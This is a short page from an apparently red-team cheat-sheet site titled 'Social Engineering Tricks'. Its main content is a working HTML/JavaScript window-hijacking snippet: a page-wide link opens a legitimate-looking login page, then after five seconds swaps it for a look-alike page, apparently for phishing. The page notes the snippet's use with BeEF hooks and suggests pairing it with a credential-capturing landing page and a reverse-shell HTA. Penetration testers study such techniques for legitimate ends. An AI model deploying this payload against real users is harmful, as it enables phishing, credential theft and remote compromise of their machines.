Libertyunix
  • About.me
  • Getting Started
    • Kali Images
    • Setting Up Your Kali Box
  • CheetSheets
    • OSCP Fun
    • Active Directory
    • Windows
    • 802-11 Wireless
    • Enumeration
    • Payloads
    • Secure Copy Protocol
    • Privilege Escalation
    • Tunneling
    • Red Team Playbook
    • Oneliners for Code Execution
  • PenTesting & Red Teaming
    • Python for Exfil
    • Using MSBuild to Execute Shellcode in C#
    • Social Engineering Tricks
    • Setting Up Caldera & Atomic Red-Team
    • Discovering & Exploiting Buffer Overflows
  • Wireless
    • An Introduction to IoT Penetration Testing
    • An Introduction to BLE - Part 1
    • BLE Deep Dive
    • Proxmark 3
  • Hack The Box
    • Fuse
    • Blunder
    • Unblanced
    • Tabby
  • Threat Hunting
    • Threat Hunter Playbook
  • DFIR
    • Creating Windows USB for DFIR & Fun (DRAFT)
  • Talks, Workshops, & WriteUps
    • The Portable Executable (PE) (DRAFT)
    • Resume
    • Presented Research
    • Offensive Security 101 Workshop
Powered by GitBook
On this page
  1. PenTesting & Red Teaming

Social Engineering Tricks

Random SocialE Stuff

PreviousUsing MSBuild to Execute Shellcode in C#NextSetting Up Caldera & Atomic Red-Team

Last updated 5 years ago

Open Page in New Tab (Useful for BeeF hooks)

<html>
<script>
var windowJack = function(){
window.open('https://legitloginpage.xyz', 'test');
setTimeout(function(){window.open('https://notlegitloginpage.xyz', 'test');}, 5000);
}
</script>
<div style="width :100%; hieght: 100%" onclick="windowJack()"><button style="cursor: pointer; background:none!important; border:none; padding:0!important; font:inherit; border-bottom:1px solid #444;">Click here to visit a legit login page</button></div>
</html>

You could combine this attack with a credential capturing landing page and reverse_shell HTA as seen in SEToolkit demo below: